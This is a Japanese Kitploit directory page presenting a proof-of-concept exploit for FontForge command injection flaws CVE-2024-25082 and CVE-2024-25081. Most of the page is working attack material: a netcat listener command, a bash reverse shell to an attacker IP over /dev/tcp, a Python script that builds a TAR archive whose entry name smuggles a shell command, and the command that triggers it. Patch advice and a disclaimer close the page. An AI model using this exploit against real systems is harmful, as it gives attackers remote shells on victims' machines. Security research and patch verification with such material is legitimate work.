Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25082_CVE-2024-25081 — FontForge Splinefontの細工されたファイル名によるコマンドインジェクション脆弱性 | Kitploit
ツール/GitHubGitHub/alielkhatteb/cve-2024-25082_cve-2024-25081
ペイロード生成脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロール学習と教育
GitHubalielkhatteb/cve-2024-25082_cve-2024-25081

CVE-2024-25082_CVE-2024-25081

FontForge Splinefontの細工されたファイル名によるコマンドインジェクション脆弱性

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
15ヶ月前未レビュー

⚠️ FontForge RCE — CVE-2024-25081 & CVE-2024-25082 - PoC

📖 概要

FontForge ≤ 20230101(Splinefont コンポーネント)における2つのコマンドインジェクション脆弱性の概念実証エクスプロイトです。

CVEベクタートリガー
CVE-2024-25081細工されたファイル名直接ファイルを開く
CVE-2024-25082細工されたアーカイブファイル名TAR/ZIP/GZ/BZ2展開

このPoCは CVE-2024-25082 を標的としています。FontForgeの自動アーカイブ展開は、サニタイズなしでファイル名をシェルに渡すため、TARエントリ名に埋め込まれたセミコロン区切りのペイロードによって任意のコマンドが実行される可能性があります。


動作原理

FontForgeはアーカイブからフォントファイルを直接開くことをサポートしています。TARアーカイブを展開する際、Splinefontコンポーネントはアーカイブエントリのファイル名を使ってシェルコマンドを構築します。ファイル名がサニタイズされていないため、エントリ名に含まれるセミコロン(;)が期待されるコマンドを逸脱し、任意のシェル命令を注入します。

悪質なTARエントリ名:

root@kitploit:~
exploit.ttf;bash /tmp/s.sh;

FontForgeがこのアーカイブを処理すると、シェルは次のように解釈します:

root@kitploit:~
<extract command> exploit.ttf ; bash /tmp/s.sh ; 

環境

  • 脆弱性ソフトウェア: FontForge ≤ 20230101
  • プラットフォーム: Linux
  • 攻撃者リスナー: 192.168.1.20:4444(必要に応じて調整)

📋 前提条件

  • Python 3 (標準ライブラリのみ、tarfileモジュール)
  • 攻撃機上の netcat
  • 標的機上の FontForge ≤ 20230101

🛠️ 概念実証

1. 攻撃機でnetcatリスナーを起動

root@kitploit:~
nc -lvnp 4444

2. 悪質なTARアーカイブを生成

root@kitploit:~
# Write the reverse shell payload
echo 'bash -i >& /dev/tcp/192.168.1.20/4444 0>&1' > /tmp/s.sh
chmod +x /tmp/s.sh

# Build the malicious archive
python3 << 'EOF'
import tarfile, io

malicious_name = "exploit.ttf;bash /tmp/s.sh;"
tar = tarfile.open("exploit.tar", "w")
info = tarfile.TarInfo(name=malicious_name)
info.size = 4
tar.addfile(info, io.BytesIO(b"AAAA"))
tar.close()
print("done")
EOF

3. 標的機でFontForgeでアーカイブを開く

root@kitploit:~
fontforge exploit.tar

リバースシェルがリスナーに接続してきます。


🔒 パッチ

FontForge post-20230101でPR #5367により修正されました。最新リリースにアップグレードしてください。

  • Debian/Ubuntu: sudo apt upgrade fontforge
  • 手動ビルド: fontforge/fontforgeから最新版を取得

🔍 参考情報

  • NVD — CVE-2024-25081
  • NVD — CVE-2024-25082
  • FontForge修正PR #5367

⚖️ 免責事項と利用条件

この概念実証(PoC)コードは、教育および許可されたペネトレーションテスト目的のみで提供されます。

  • 許可されていません: このコードを他の目的で修正、再配布、または使用することはできません。
  • 許可されていない使用や修正は、違法かつ非倫理的である可能性があります。
  • 著者は、いかなる誤用や損害についても一切の責任を負いません。
ツールをダウンロード